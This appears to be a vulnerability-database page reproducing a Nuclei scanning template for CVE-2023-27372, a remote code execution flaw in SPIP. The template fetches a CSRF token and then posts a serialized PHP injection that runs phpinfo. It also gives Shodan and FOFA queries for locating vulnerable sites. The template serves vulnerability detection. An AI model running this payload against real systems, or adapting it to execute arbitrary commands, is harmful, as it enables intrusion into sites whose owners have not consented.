CVE-2023-27372: SPIP - Remote Command Execution

2025-08-01 SPIP PoC Public

Description

SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.

PoC

id: CVE-2023-27372

info:
  name: SPIP - Remote Command Execution
  author: DhiyaneshDK,nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of SPIP.
  reference:
    - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
    - https://github.com/nuts7/CVE-2023-27372
    - http://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - http://packetstormsecurity.com/files/173044/SPIP-4.2.1-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27372
    epss-score: 0.99682
    epss-percentile: 0.9995
    cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: spip
    product: spip
    shodan-query:
      - html:"spip.php?page=backend"
      - http.html:"spip.php?page=backend"
      - cpe:"cpe:2.3:a:spip:spip"
    fofa-query: body="spip.php?page=backend"
  tags: cve,cve2023,packetstorm,spip,rce,vkev,vuln

http:
  - raw:
      - |
        GET /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "PHP Extension"
          - "PHP Version"
          - "<!DOCTYPE html"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - "name='formulaire_action_args'[^>]*value='([^']*)'"
        internal: true
        part: body_1

      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body_2
# digest: 4a0a0047304502202449a06444164fb614b27cfce35ad6021e898eed4d65e89f225ef612dbb2e9c0022100b2a8ad1dd9ef4d52ec7f61cc96014f6d7e1494a1e1ef2c20f582665e01fa4f6a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities